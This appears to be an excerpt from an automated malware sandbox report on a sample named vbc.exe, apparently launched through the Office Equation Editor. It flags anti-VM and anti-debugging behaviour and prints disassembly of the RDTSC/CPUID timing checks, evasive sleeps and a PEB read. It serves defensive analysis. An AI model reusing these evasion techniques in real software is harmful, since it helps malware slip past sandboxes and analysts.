Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2793 6_2_003E2793
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 rdtsc 6_2_003E54E7
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740 Thread sleep time: -60000s >= -30000s Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 rdtsc 6_2_003E54E7
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h]